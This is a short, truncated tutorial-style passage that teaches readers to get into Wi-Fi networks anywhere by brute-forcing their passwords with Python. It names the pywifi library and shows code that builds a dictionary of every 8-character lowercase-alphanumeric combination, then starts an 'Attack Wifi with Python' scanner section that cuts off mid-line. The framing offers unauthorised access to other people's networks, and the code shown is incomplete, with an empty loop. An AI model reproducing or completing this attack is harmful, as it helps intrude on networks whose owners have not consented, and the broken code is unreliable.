This article aims to guide curious ones like you, techy or non-techy gaining easy wifi access anywhere you go with python. Let’s dive in…
1. Dependency pywifi
pywifi provides a cross-platform Python module for manipulating wireless interfaces. Easy to use; Supports Windows and Linux.
2. Construct a wifi dictionary
Including numbers (0–9), letters (a-z, A-Z), special characters (!@#$%^&*()_+=-)
A normal password consists of 8 characters with only numbers and small letters so we could pick any random combination of those and store them in to a .text file.
import itertools as its
words = "1234567890abcdefghijklmnopqrstuvwxyz" # a set of password characters
r =its.product(words,repeat=8) # random combination of 8 characters
dic = open("pwd.txt","a") # store wifi combinations in file
for i in r:
3. Attack Wifi with Python
create a file
import pywifi
import time
from pywifi import const
# WiFi scanner
def wifi_scan():
# initialise wifi
wifi = pywifi.PyWiFi()
# use the first interface
interface =…